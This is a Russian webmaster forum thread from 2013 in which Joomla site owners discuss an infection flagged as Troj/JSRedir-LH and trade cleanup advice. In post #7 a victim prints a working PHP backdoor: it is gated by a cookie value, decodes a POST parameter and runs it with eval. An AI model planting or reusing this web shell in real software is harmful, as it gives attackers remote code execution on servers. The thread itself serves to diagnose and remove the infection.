X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Внимание! Атака на сайты Joomla, вирус Troj/JSRedir-LH
Rapturious
Rapturious
Topic Starter сообщение 4.5.2013, 8:03; Ответить: Rapturious
Сообщение #1


Новичок
*

Группа: User
Сообщений: 22
Регистрация: 14.10.2010
Поблагодарили: 2 раза
Репутация:   0  


Салют! Вчера Яндекс прислал письмецо, что сайт заражен. И вот сегодня под утро все таки выяснил в чем же дело

Внимание! Срочно обновите Joomla до последней версии 2.5.11! Обновите все установленные бесплатные расширения из каталога JED, особенно редакторы и компоненты (например формы контактов). Вчера была зафиксирована массовая атака на сайты Joomla. Сегодня уже начали поступать первые пострадавшие.

"Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш компьютер вирусом или получить доступ к вашей личной информации. Вредоносный код: содержит Troj/JSRedir-LH (по данным компании Sophos)."

Первые симптомы болезни: в начало каждого .js файла (можно начать проверку с каталога /media/system/js) дописывается вредоносный код, который содержит iframe на атакующий сайт. Источник.

Кто стал "счастливчиком" поделитесь методом борьбы (может кроме ай-болита есть еще методы) с этим чудовищем. В ручную все .js файлы долго вычищать.

Сообщение отредактировал Rapturious - 4.5.2013, 8:10


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
rus23kav
rus23kav
сообщение 4.5.2013, 9:03; Ответить: rus23kav
Сообщение #2


Бывалый
****

Группа: User
Сообщений: 413
Регистрация: 13.7.2011
Поблагодарили: 97 раз
Репутация:   21  


Зачем вычещать? Проще перезалить файлы движка и обновиться.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
install
install
сообщение 4.5.2013, 9:40; Ответить: install
Сообщение #3


Яндекс ЛОХ
*******


Группа: Active User
Сообщений: 3530
Регистрация: 28.5.2009
Из: Нижневартовска
Поблагодарили: 1377 раз
Репутация:   201  


Уже весна на дворе.
Эта фигня еще в январе была запущена и большинство в том же январе залатало эти дырки и обновились.
Просыпайтесь smile.gif


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rapturious
Rapturious
Topic Starter сообщение 4.5.2013, 9:44; Ответить: Rapturious
Сообщение #4


Новичок
*

Группа: User
Сообщений: 22
Регистрация: 14.10.2010
Поблагодарили: 2 раза
Репутация:   0  


install,
Вчера Яндекс и разбудил.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Velleks
Velleks
сообщение 5.5.2013, 2:24; Ответить: Velleks
Сообщение #5


Новичок
*

Группа: Viewer
Сообщений: 1
Регистрация: 31.1.2013
Поблагодарили: 0 раз
Репутация:   0  


Самого затронула эта проблема, тоже интересует как почистить файлы.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
meefa
meefa
сообщение 5.5.2013, 3:08; Ответить: meefa
Сообщение #6


Новичок
*

Группа: User
Сообщений: 47
Регистрация: 10.5.2011
Из: Москва
Поблагодарили: 6 раз
Репутация:   2  


Вот здесь толково написано как удалить вирус: http://fstrange.ru/coder/php/joomla-udalenie-virusov.html
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mitrokov
mitrokov
сообщение 6.5.2013, 16:54; Ответить: mitrokov
Сообщение #7


Новичок
*

Группа: Viewer
Сообщений: 1
Регистрация: 2.4.2012
Поблагодарили: 0 раз
Репутация:   0  


У себя обнаружил кучу левых файлов вида 0a41ed3.php размещаются файлы во всех папках и подкапках сайта, заметил два вида содержимого
первый:
CODE
<?php echo "#!!#";

второй :
CODE
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
echo '<textarea id=areatext>';
eval($msg);
echo '</textarea>bg';
exit;
}}
?>


Если кто разбирается может разъясните что эт за фигня такая.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rapturious
Rapturious
Topic Starter сообщение 6.5.2013, 16:59; Ответить: Rapturious
Сообщение #8


Новичок
*

Группа: User
Сообщений: 22
Регистрация: 14.10.2010
Поблагодарили: 2 раза
Репутация:   0  


mitrokov,
это и есть вирус Joomla удаление вирусов

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Регистрация Вашего сайта (профиля,DLE сайты,подписи на форумах,постинг Тиц 10> , ПР 1>)
312 kaartes 112860 22.5.2018, 12:07
автор: avega
Горячая тема (нет новых ответов) Услуги по CMS Wordpress, DLE, Joomla!. Правки, ремонт, настройка.
Редактирование и правки. Низкие цены.
156 contex1 70812 22.5.2018, 0:06
автор: AnnaProf
Горячая тема (нет новых ответов) Атака клонов! Или как бороться с мультиаккаунтами.
47 Pelican_Program 10592 17.5.2018, 19:24
автор: Pelican_Program
Открытая тема (нет новых ответов) Покупаю муз сайты
не дорого/под развитие
4 seostock 1397 16.5.2018, 21:44
автор: seostock
Открытая тема (нет новых ответов) Куплю сайты принятые в РСЯ
Можно без дохода
0 Ksardas777 345 16.5.2018, 18:10
автор: Ksardas777


 



RSS Текстовая версия Сейчас: 24.5.2018, 12:26
Дизайн